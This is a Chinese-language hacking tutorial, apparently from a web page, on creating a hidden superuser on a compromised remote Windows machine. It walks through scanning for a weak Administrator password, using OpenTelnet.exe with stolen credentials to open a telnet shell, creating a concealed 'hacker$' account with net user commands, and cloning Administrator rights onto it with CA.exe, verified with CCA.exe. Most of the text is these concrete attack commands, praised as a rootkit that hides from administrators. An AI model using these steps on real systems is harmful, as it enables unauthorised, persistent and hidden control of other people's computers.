一、利用帐户克隆工具来创建 Clone Administrator(CA、exe),利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升,是一个不错的ROOT KIT。 现在,我们就来看看如何利用帐户克隆工具在肉鸡上创建隐藏的超级用户。 利用流光、SuperScan等进行扫描,假设已经扫描到一远程主机的Administrator帐户,其密码为123。我们可以使用DameWare Mini Remote Control(简称DMRC),在图形界面(GUI)中来远程控制远程主机。也可以使用OpenTelnet、exe工具来开启远程主机的TELNET服务,其命令格式为:OpenTelnet、exe \server username password NTLMAuthor telnetport,使用命令:opentelnet \192、XX、XX、2 Administrator '123' 0 99,呵呵,没想这么成功容易就开启肉鸡的TELNET吧!接着使用命令:Telnet 192、XX、XX、2 99,输入帐户及密码,成功获取一SHELL。首先想办法查看一下有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然也会禁用其他用户。在图形界面下,非常容易识别,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉。但在命令行状态下,只能使用命令:“net user 用户名”一个一个来查看用户是否被禁用。如果懒得这样麻烦,可自行建立一个新的帐户,命令为:“Net user hacker$ youkou /add”,然后使用命令:“Net user hacker$ /active:no”来停用此帐户。断开与远程主机的连接,用小榕的超级用户克隆程序CA、exe,将被禁用的用户hacker$克隆成超级用户,命令为:CA、EXE \192、XX、XX、2 Administrator 123 hacker$ youkou,成功!这时,hacker$就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。但还是得检查一下,用CCA、exe,命令如下:cca \192、XX、XX、2 administrator 123。看到这一行返回信息没有?“[hacker$] AS SAME AS [Administrator]”,说明hacker$帐户和Administrator相同,克隆成功。
上一篇:银行联行号怎么查